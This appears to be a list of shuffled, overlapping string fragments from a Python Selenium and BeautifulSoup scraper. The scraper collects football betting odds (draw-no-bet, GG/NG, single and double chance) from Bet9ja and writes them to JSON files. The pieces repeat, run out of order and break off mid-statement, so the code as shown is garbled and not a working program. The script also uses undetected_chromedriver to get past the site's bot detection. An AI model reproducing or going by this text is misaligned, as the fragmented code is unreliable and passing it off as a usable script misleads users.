"or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2)",
"range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse",
"prefix p = bet9ja + 'competition/soccer/' # link Object links = {} #",
"\"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner",
"Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height,",
"'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup =",
"Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds s_odds =",
"Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in",
"undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0",
"or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li',",
"= p + u + v + w # Gather links links[a['title']] =",
"= fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4)",
"# Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as",
"== 'DNB': index = i break # Activate DNB if index > -1:",
"'r') as json_file: global data data = json.load(json_file) for e in data: for",
"each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs '",
"home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip()",
"Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target index =",
"e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile:",
"Menu def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) #",
"= {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] =",
"{} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div',",
"for each in elem: # Compile info_1 = {} info_2 = {} home_team",
"= e info['match'] = home_team + ' vs ' + away_team info['time'] =",
"Dependencies # ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui",
"index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the",
"= [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:",
"= e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '')",
"info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or",
"div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and Menu",
"uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) #",
"a['id'].lower()[1:] # full link fl = p + u + v + w",
"'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match']",
"# Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target",
"# Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile,",
"# Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find(",
"0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with",
"ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by",
"div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id =",
"each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X']",
"= BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: #",
"# Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem",
"= [] for t in d: f = {} f['title'] = t['title'] f['id']",
"each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt',",
"seconds time.sleep(5) # Index of target index = -1 # Get index soup",
"ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= #",
"continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance",
"soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if",
"= each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match']",
"away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] =",
"Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global",
"# GGNG def GGNG(): # Odds odds = [] # fetch links with",
"# fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file)",
"= home_team + ' vs ' + away_team info_2['match'] = home_team + '",
"import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from",
"Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds = []",
"Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each",
"and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() #",
"-1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for",
"False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # =============================================================================================================",
"web prefix p = bet9ja + 'competition/soccer/' # link Object links = {}",
"json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): #",
"seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table >",
"Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu",
"each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] =",
"box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB':",
"+ ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li',",
"vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all(",
"or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else:",
"= json.load(json_file) for e in data: for a in data[e]['submenu']: u = e.lower().replace(',',",
"\"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f",
"info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"Double Chance and Single Chance def DS_chance(): # Odds s_odds = [] d_odds",
"open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() # getMenu() # getLinks_Bet9ja() DS_chance()",
"# link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as",
"# Bet9ja Menu def getMenu(): # Object data = {} # Initialise Browser",
"WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse",
"0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip()",
"'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + ' vs",
"from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json import",
"Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page height =",
"import json import re from pathlib import Path # Browser Configurations # =============================================================================================================",
"each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team +",
"as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja",
"= each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li',",
"data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the",
"Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click()",
"'') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w =",
"'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + '",
"each in elem: # Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip()",
"'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team +",
"selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC",
"for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds",
"GGNG(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser,",
"in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate",
"soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f = {} f['title']",
"Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target index",
"the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10):",
"' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box):",
"Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile:",
"range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc",
"e info['match'] = home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip()",
"+ ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li',",
"= soup.select('.sports-table > .table-f') for each in elem: # Compile info_1 = {}",
"info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team =",
"10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup =",
"', '') + '/' w = a['id'].lower()[1:] # full link fl = p",
"continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def",
"= {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category']",
"\"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and Menu link",
"else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() #",
"Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/')",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0",
"Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4)",
"selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json import re",
"0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds,",
"# Odds s_odds = [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt',",
"'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all(",
"info_1['match'] = home_team + ' vs ' + away_team info_2['match'] = home_team +",
"# Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until(",
"away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + '",
"document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds",
"Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div',",
"WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4",
"= {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) #",
"{} data[title]['location'] = id # fetch Submenu and Menu link for each in",
"indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja",
"'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds",
"= home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] =",
"info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue",
"or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li',",
"def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait",
"' vs ' + away_team info_2['match'] = home_team + ' vs ' +",
"'', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w')",
"s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w')",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload",
"Bet9ja Menu def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja)",
"v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] # full",
"for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title]",
"odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data",
"# fetch Submenu and Menu link for each in data: l = data[each]['location']",
"def DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r')",
"f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu']",
"'DNB': index = i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME,",
"'competition/soccer/' # link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r')",
"import BeautifulSoup import time import json import re from pathlib import Path #",
"in d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id'])",
"# Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return",
"each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] =",
"# Dependencies # ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from",
"outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def",
"for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div",
"# Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja",
"i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) #",
"= e info_2['category'] = e info_1['match'] = home_team + ' vs ' +",
"f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON",
"# # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"json_file: global data data = json.load(json_file) for e in data: # Initiate Browser",
"d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f)",
"t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as",
"import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False",
"d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f =",
"else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() #",
"data[title]['location'] = id # fetch Submenu and Menu link for each in data:",
"'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i",
"Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch",
"data[title] = {} data[title]['location'] = id # fetch Submenu and Menu link for",
"BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper =",
"info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip()",
"time import json import re from pathlib import Path # Browser Configurations #",
"open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja():",
"for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5)",
"home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e",
"index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td',",
"'/' w = a['id'].lower()[1:] # full link fl = p + u +",
"page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0,",
"info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue",
"with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def",
"data data = json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) #",
"v + w # Gather links links[a['title']] = fl # Save links with",
"# fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file)",
".table-f') for each in elem: # Compile info = {} home_team = each.find(",
"global data data = json.load(json_file) for e in data: for a in data[e]['submenu']:",
"data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a',",
"soup.select('.sports-table > .table-f') for each in elem: # Compile info = {} home_team",
"each in elem: # Compile info_1 = {} info_2 = {} home_team =",
"\"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info",
"links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile,",
"d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data",
"'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as",
"from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless",
"# Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit()",
"u + v + w # Gather links links[a['title']] = fl # Save",
"div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] =",
"# Double Chance and Single Chance def DS_chance(): # Odds s_odds = []",
"# Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with",
"# Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/'",
"json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB():",
"'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w')",
"outfile, indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds",
"# ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def",
"info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or",
"= BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in",
"json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds",
"len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index =",
"' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all(",
"Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() #",
"-1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page height",
"data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of",
"each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 #",
"Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup =",
"Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() #",
"# Compile info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip()",
"each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] =",
"+ away_team info_2['match'] = home_team + ' vs ' + away_team info_1['time'] =",
"= [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data",
"= {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category']",
"div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e =",
"= home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] =",
"of target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box",
"for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5)",
"BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip()",
"json.load(json_file) for e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace('",
"soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]:",
"fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for",
"= uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" #",
"menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for e",
"pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless =",
"+ away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"# Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner >",
"DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) #",
"'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all(",
"Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja",
"= False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites #",
"EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json",
"Submenu and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click()",
"'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload",
"index = i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] =",
"' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"= div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id",
"'').replace(' ', '') + '/' w = a['id'].lower()[1:] # full link fl =",
"title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] =",
"DS_chance(): # Odds s_odds = [] d_odds = [] # fetch links with",
"= each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category']",
"import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import",
"# ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data = {} #",
"d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in",
"if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if",
"', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w",
"{} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e",
"'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5",
"target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box =",
"outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds =",
